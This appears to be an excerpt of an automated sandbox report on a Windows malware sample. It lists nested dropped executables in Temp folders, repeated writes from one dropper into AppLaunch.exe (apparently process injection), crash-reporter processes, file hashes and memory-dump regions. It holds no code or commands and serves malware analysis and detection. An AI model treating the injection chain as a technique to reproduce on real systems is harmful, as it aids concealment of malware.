PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2340 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\SysWOW64\WerFault.exe
PID 2340 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\SysWOW64\WerFault.exe
PID 2340 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\SysWOW64\WerFault.exe
PID 2340 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\SysWOW64\WerFault.exe
PID 2340 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\SysWOW64\WerFault.exe
PID 2340 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\SysWOW64\WerFault.exe
PID 2340 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 268

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 284

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe

MD5 e8659f1f372b52210876f4051813ccec
SHA1 ecf7bae8ed20e712508d02587b4a59d381e43178
SHA256 93c4eca8fced0c6afd42c7fb867e05132a60d7e1b3b9d3c0b085fb2ae87e9df1
SHA512 489acd7c289d6ea1fcd545d0af9bd59f440a6a50150be82d5faf86eba79c1297ee907c85e902bfaf99979f88c97886c802b6099897db53e56698372af37d836c

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe

MD5 e8659f1f372b52210876f4051813ccec
SHA1 ecf7bae8ed20e712508d02587b4a59d381e43178
SHA256 93c4eca8fced0c6afd42c7fb867e05132a60d7e1b3b9d3c0b085fb2ae87e9df1
SHA512 489acd7c289d6ea1fcd545d0af9bd59f440a6a50150be82d5faf86eba79c1297ee907c85e902bfaf99979f88c97886c802b6099897db53e56698372af37d836c

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe

MD5 e8659f1f372b52210876f4051813ccec
SHA1 ecf7bae8ed20e712508d02587b4a59d381e43178
SHA256 93c4eca8fced0c6afd42c7fb867e05132a60d7e1b3b9d3c0b085fb2ae87e9df1
SHA512 489acd7c289d6ea1fcd545d0af9bd59f440a6a50150be82d5faf86eba79c1297ee907c85e902bfaf99979f88c97886c802b6099897db53e56698372af37d836c

\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe

MD5 e8659f1f372b52210876f4051813ccec
SHA1 ecf7bae8ed20e712508d02587b4a59d381e43178
SHA256 93c4eca8fced0c6afd42c7fb867e05132a60d7e1b3b9d3c0b085fb2ae87e9df1
SHA512 489acd7c289d6ea1fcd545d0af9bd59f440a6a50150be82d5faf86eba79c1297ee907c85e902bfaf99979f88c97886c802b6099897db53e56698372af37d836c

\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe

MD5 d5cdc5a11ac6a519883dfc2c73dbc3c3
SHA1 3f241f2baf5bbde517079a01dff7e97396b9c9fc
SHA256 5b903ab1635ac6ff4d04dc506a69d579cf6f0f72043921a2e1db933d6d95259b
SHA512 c4fc15eb2be3fb91975e7276726b83a19ecb50206b412170697b878fef738e8828a10921b2a1acba9919e4dbe0f1cfc22d131bfb2551f746563ccb7006b4bf3e

\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe

MD5 d5cdc5a11ac6a519883dfc2c73dbc3c3
SHA1 3f241f2baf5bbde517079a01dff7e97396b9c9fc
SHA256 5b903ab1635ac6ff4d04dc506a69d579cf6f0f72043921a2e1db933d6d95259b
SHA512 c4fc15eb2be3fb91975e7276726b83a19ecb50206b412170697b878fef738e8828a10921b2a1acba9919e4dbe0f1cfc22d131bfb2551f746563ccb7006b4bf3e

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe

MD5 d5cdc5a11ac6a519883dfc2c73dbc3c3
SHA1 3f241f2baf5bbde517079a01dff7e97396b9c9fc
SHA256 5b903ab1635ac6ff4d04dc506a69d579cf6f0f72043921a2e1db933d6d95259b
SHA512 c4fc15eb2be3fb91975e7276726b83a19ecb50206b412170697b878fef738e8828a10921b2a1acba9919e4dbe0f1cfc22d131bfb2551f746563ccb7006b4bf3e

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe

MD5 d5cdc5a11ac6a519883dfc2c73dbc3c3
SHA1 3f241f2baf5bbde517079a01dff7e97396b9c9fc
SHA256 5b903ab1635ac6ff4d04dc506a69d579cf6f0f72043921a2e1db933d6d95259b
SHA512 c4fc15eb2be3fb91975e7276726b83a19ecb50206b412170697b878fef738e8828a10921b2a1acba9919e4dbe0f1cfc22d131bfb2551f746563ccb7006b4bf3e

\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe

MD5 de9cc327a6512de874276a4e19794146
SHA1 27e1b7b670ee7bc2e3a6438cca8ad5689bdec6ba
SHA256 44630670db7fdb680247cc5f101b53f9e52dac20c7c4ce9b0d2fbd2251518b47
SHA512 1574cf35bdc5f55742871f963ba01991d916476e3320eb4e64b2e7323f70e1a85ff354e672d40268ab7756e24f10eeabe318b38b05e9ea8b49683ab4d0a4a407

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe

MD5 de9cc327a6512de874276a4e19794146
SHA1 27e1b7b670ee7bc2e3a6438cca8ad5689bdec6ba
SHA256 44630670db7fdb680247cc5f101b53f9e52dac20c7c4ce9b0d2fbd2251518b47
SHA512 1574cf35bdc5f55742871f963ba01991d916476e3320eb4e64b2e7323f70e1a85ff354e672d40268ab7756e24f10eeabe318b38b05e9ea8b49683ab4d0a4a407

\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe

MD5 de9cc327a6512de874276a4e19794146
SHA1 27e1b7b670ee7bc2e3a6438cca8ad5689bdec6ba
SHA256 44630670db7fdb680247cc5f101b53f9e52dac20c7c4ce9b0d2fbd2251518b47
SHA512 1574cf35bdc5f55742871f963ba01991d916476e3320eb4e64b2e7323f70e1a85ff354e672d40268ab7756e24f10eeabe318b38b05e9ea8b49683ab4d0a4a407

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe

MD5 de9cc327a6512de874276a4e19794146
SHA1 27e1b7b670ee7bc2e3a6438cca8ad5689bdec6ba
SHA256 44630670db7fdb680247cc5f101b53f9e52dac20c7c4ce9b0d2fbd2251518b47
SHA512 1574cf35bdc5f55742871f963ba01991d916476e3320eb4e64b2e7323f70e1a85ff354e672d40268ab7756e24f10eeabe318b38b05e9ea8b49683ab4d0a4a407

\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

memory/2904-40-0x00000000020B0000-0x00000000020CE000-memory.dmp

memory/2904-41-0x00000000020E0000-0x00000000020FC000-memory.dmp

memory/2904-42-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-43-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-45-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-49-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-47-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-53-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-51-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-55-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-59-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-57-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-63-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-61-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-67-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-65-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/2904-69-0x00000000020E0000-0x00000000020F6000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea

memory/1720-76-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1720-77-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1720-78-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1720-79-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1720-85-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1720-83-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1720-82-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1720-81-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1720-80-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1720-87-0x0000000000400000-0x0000000000433000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea